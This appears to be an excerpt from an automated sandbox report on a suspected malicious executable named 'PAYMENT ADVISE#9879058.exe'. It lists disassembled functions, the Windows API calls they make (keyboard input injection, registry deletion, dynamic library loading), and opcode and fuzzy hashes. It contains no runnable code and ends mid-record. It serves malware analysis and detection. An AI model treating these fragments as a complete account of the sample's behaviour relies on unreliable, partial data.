                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                          • String ID:
                          • API String ID: 1690418490-0
                          • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                          • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                          • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                          • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                          Function 00475ACA Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                          • CoInitialize.OLE32(00000000), ref: 00475B71
                          • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                          • CoUninitialize.OLE32 ref: 00475D71
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                          • String ID: .lnk$HH
                          • API String ID: 886957087-3121654589
                          • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                          • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                          • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                          • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                          Function 0045F132 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128windowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Menu$Delete$InfoItem_memset
                          • String ID: 0
                          • API String ID: 1173514356-4108050209
                          • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                          • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                          • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                          • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                          Function 004692E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 763830540-1403004172
                          • Opcode ID: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
                          • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                          • Opcode Fuzzy Hash: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
                          • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                          Function 00443981 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(?), ref: 004439B4
                            • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                            • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                            • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CurrentHandleProcess$Duplicate
                          • String ID: nul
                          • API String ID: 2124370227-2873401336
                          • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                          • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                          • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                          • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                          Function 00443887 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                            • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                            • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                            • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CurrentHandleProcess$Duplicate
                          • String ID: nul
                          • API String ID: 2124370227-2873401336
                          • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                          • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                          • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                          • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                          Function 004412AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                          • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                          • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                          • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyLibraryLoadWindow
                          • String ID: SysAnimate32
                          • API String ID: 3529120543-1011021900
                          • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                          • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                          • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                          • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                          Function 00443009 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON
                          Download Yara Rule
                          APIs
                          • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                          • TranslateMessage.USER32(?), ref: 0044308B
                          • DispatchMessageW.USER32(?), ref: 00443096
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Message$Peek$DispatchTranslate
                          • String ID: *.*
                          • API String ID: 1795658109-438819550
                          • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                          • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                          • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                          • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                          Function 004609BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                            • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                            • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                            • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                            • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                          • GetFocus.USER32 ref: 004609EF
                            • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                            • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                          • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                          • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                          • __swprintf.LIBCMT ref: 00460A7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                          • String ID: %s%d
                          • API String ID: 991886796-1110647743
                          • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                          • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                          • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                          • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                          Function 0040F790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _memset$_sprintf
                          • String ID: %02X
                          • API String ID: 891462717-436463671
                          • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                          • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                          • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                          • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                          Function 0040F3B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0042CD00
                          • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                            • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,?,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,004A8E80,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,0040F3D2), ref: 0040FFCA
                            • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                            • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                            • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                            • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                            • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                            • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                          • String ID: $OH$@OH$X
                          • API String ID: 3491138722-1394974532
                          • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                          • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                          • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                          • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                          Function 00463D7E Relevance: 7.6, APIs: 5, Instructions: 141libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                          • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                          • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                          • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                          • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AddressProc$Library$FreeLoad
                          • String ID:
                          • API String ID: 2449869053-0
                          • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                          • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                          • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                          • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                          Function 0044C379 Relevance: 7.6, APIs: 5, Instructions: 137windowkeyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                          • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                          • SendInput.USER32 ref: 0044C509
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: KeyboardMessagePostState$InputSend
                          • String ID:
                          • API String ID: 3031425849-0
                          • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                          • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                          • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                          • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                          Function 004422B9 Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                          • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                          • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Enum$CloseDeleteOpen
                          • String ID:
                          • API String ID: 2095303065-0
                          • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                          • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                          • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                          • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                          Function 0045C277 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                          Download Yara Rule
                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                          • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                          • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String
                          • String ID:
                          • API String ID: 2832842796-0
                          • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                          • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                          • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                          • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                          Function 0044796B Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?,?), ref: 00447997
                          • GetCursorPos.USER32(?), ref: 004479A2
                          • ScreenToClient.USER32(?,?), ref: 004479BE
                          • WindowFromPoint.USER32(?,?), ref: 004479FF
                          • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Client$CursorFromPointProcRectScreenWindow
                          • String ID:
                          • API String ID: 1822080540-0
                          • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                          • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
